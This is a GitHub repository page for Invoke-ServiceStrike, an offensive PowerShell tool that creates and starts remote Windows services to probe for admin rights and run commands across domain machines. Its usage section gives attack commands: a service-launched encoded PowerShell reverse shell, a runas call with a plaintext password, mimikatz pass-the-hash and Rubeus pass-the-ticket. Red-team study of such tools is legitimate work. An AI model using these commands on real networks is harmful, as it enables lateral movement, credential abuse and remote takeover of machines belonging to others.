Skip to content

Creates and starts a service by bypassing the OpenService call to verify whether the current user has local administrator privileges on domain or LAN machines, assuming that only the SC_MANAGER_ALL_ACCESS right is available on the SCManager

License

Notifications You must be signed in to change notification settings

pol4ir/Invoke-ServiceStrike

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
 
 
 
 
 
 
 
 

Repository files navigation

Invoke-ServiceStrike

Attempts to create and start a service by bypassing the OpenService call, in order to verify whether the current user has local admin privileges on domain or LAN machines, assuming that only the SC_MANAGER_ALL_ACCESS right is available on the SCManager.

This script includes and executes a modified version of Invoke-PsExec originally published by Will Schroeder (@harmj0y).

Usage

Invoke-ServiceStrike -Command <cmd>
Invoke-ServiceStrike -Command <revShell> [-timeout <45000> -threads <5> -ComputerName <'192.168.1.103'> -ServiceName <sname>]

RunAs

The script runs under the current user session. If you're in an interactive shell and need to execute it under a different security context, you can use Runas.

runas /user:contoso.local\user1 /netonly powershell

If you're working in a non-interactive shell, you can use Invoke-RunasCs

Invoke-RunasCs -Domain contoso.local -Username user1 -Password dfgV?DS7-8 -Command "powershell . C:\Invoke-ServiceStrike.ps1;Invoke-ServiceStrike -Command 'cmd /c powershell -e <revb64>' -ServiceName TEST" -logontype 9

PTH

mimikatz.exe "sekurlsa::pth /domain:<> /user:<user> /ntlm:<hash> /run:powershell.exe"

PTT

Rubeus.exe -args ptt /ticket:<ticket>

About

Creates and starts a service by bypassing the OpenService call to verify whether the current user has local administrator privileges on domain or LAN machines, assuming that only the SC_MANAGER_ALL_ACCESS right is available on the SCManager

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published